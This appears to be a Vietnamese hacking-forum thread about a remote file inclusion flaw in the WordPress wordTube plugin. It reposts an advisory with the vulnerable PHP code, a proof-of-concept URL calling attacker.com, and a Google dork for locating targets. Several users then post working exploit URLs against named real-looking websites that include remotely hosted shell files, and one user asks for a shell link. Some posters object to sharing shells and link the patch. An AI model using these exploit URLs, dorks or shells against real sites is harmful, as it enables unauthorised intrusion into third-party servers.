Latest posts for the topic "wordpress plugins - Remote File Inclusion (High)"

wordpress plugins - Remote File Inclusion (High)

L0ng3ta — GMT

http://securityreason.com/securityalert/2660 Vulnerability: ~~~~~~~~~~~~~ - Invalid include function at wordtube-button.php : ----------------wordtube-button.php------------------- ... */ // get and set path of function if (!$_POST) $wppath=$_GET['wpPATH']; else $wppath=$_POST['wpPATH']; require_once($wppath.'/wp-config.php'); require_once($wppath.'/wp-admin/admin.php'); ... ---------------------------------------------------------------- Input passed to the "wpPATH" parameter in wordtube-button.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled. Poc/Exploit: ~~~~~~~~~ http://www.target.com/wp-content/plugins/wordtube/wordtube-button .php?wpPATH=http://attacker.com/evil? Google dork: ~~~~~~~~~ inurl:/plugins/wordtube Solution: ~~~~~~ - Edit the source code to ensure that input is properly verified. - Turn off register_globals - use the latest version =================== cái này lâu rồi nhưng search lại vẫn dính đầy. http://xxx.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sgstars.tripod.com/shell.txt? @Đã sửa link ...sorry.

wordpress plugins - Remote File Inclusion (High)

184 — GMT

ai có link shell cho mượn cái nhẩy :cry:

wordpress plugins - Remote File Inclusion (High)

minhquan1712 — GMT

http://oakviewhomes.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://it-more.net/coolkid.txt? :P) :|-)) . Xài source code free là vậy đó, bị hack lúc nèo ko hay ^^

wordpress plugins - Remote File Inclusion (High)

L0ng3ta — GMT

Lưu ý để tránh nhưng người phá phách nhưng chưa thực sự ý thức và hiểu rõ vấn đề làm ơn lần sau đừng nên đưa shell lên như thế.

wordpress plugins - Remote File Inclusion (High)

minhquan1712 — GMT

Lưu ý để tránh nhưng người phá phách nhưng chưa thực sự ý thức và hiểu rõ vấn đề làm ơn lần sau đừng nên đưa shell lên như thế.

thì để cho bạn đó nghịch được ko đã chứ bro ^^.

wordpress plugins - Remote File Inclusion (High)

gsmth — GMT

minhquan1712 wrote:

http://oakviewhomes.com/home/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://it-more.net/coolkid.txt? :P) :|-)) . Xài source code free là vậy đó, bị hack lúc nèo ko hay ^^

HVA cũng đang xài "source code free" đó :)) Remote File Inclusion chỉ xảy ra cho wordpress có dùng wordtube plugin bản cũ, chưa được fix lỗi. Wordtube có bản vá lỗi, và có thể tìm thấy tại: http://wordpress.org/extend/plugins/wordtube/ http://alexrabe.boelinger.com/?page_id=20

wordpress plugins - Remote File Inclusion (High)

minhquan1712 — GMT

HVA cũng đang xài "source code free" đó

nhưng chẳng phải là bro conmale đã nói là jForum của HVA khác khá nhiều với bản gốc sao?Tức là đã wa nhiều bước thay đổi mã nguồn để nâng tính bảo mật lên rồi ^^.

wordpress plugins - Remote File Inclusion (High)

bmc_smile — GMT

tại lười vá lỗi nên bị thôi @minhquan1712: ko phải free mà củ chuối đâu , dùng bản thương mại vẫn die bình thường nếu ko vá lỗi giống hồi HVA dùng IPB. Nên mong bạn đừng có suy nghĩ lệch lạc như thế. (nói nhỏ, bản VBB của bạn mình check thấy là hàng null đấy ~.~).